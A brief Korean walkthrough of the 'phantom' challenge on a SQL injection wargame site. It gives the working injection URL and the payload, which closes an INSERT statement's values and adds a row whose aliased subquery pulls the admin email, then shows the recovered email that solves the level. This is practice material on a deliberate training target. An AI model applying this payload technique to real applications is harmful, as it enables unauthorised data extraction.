phantom

첫 화면이다.

joinmail에 test 를 넣어보면 아래와 같은 결과가 나온다.

https://los.rubiya.kr/chall/phantom_e2e30eaf1c0b3cb61b4b72a932c849fe.php?joinmail=%27),(0,%27<MY_IP>%27,(select%20email%20from%20prob_phantom%20a%20where%20no=1))%23 에 접속하면 email을 알아낼 수 있다.

joinmail에 '),(0,'<MY_IP>',(select email from prob_phantom a where no=1))# 을 넣은 셈이다.

바로 select email from prob_phantom where no=1 을 하는 것은 오류가 발생한다.

현재 테이블에서 값을 뽑아 현재 테이블의 값으로 저장하는 것은 안 되기 때문이다.

따라서 a 라는 별칭을 사용한 것이다.

https://los.rubiya.kr/chall/phantom_e2e30eaf1c0b3cb61b4b72a932c849fe.php?email=admin_secure_email@rubiya.kr 에 접속하면 문제가 풀린다.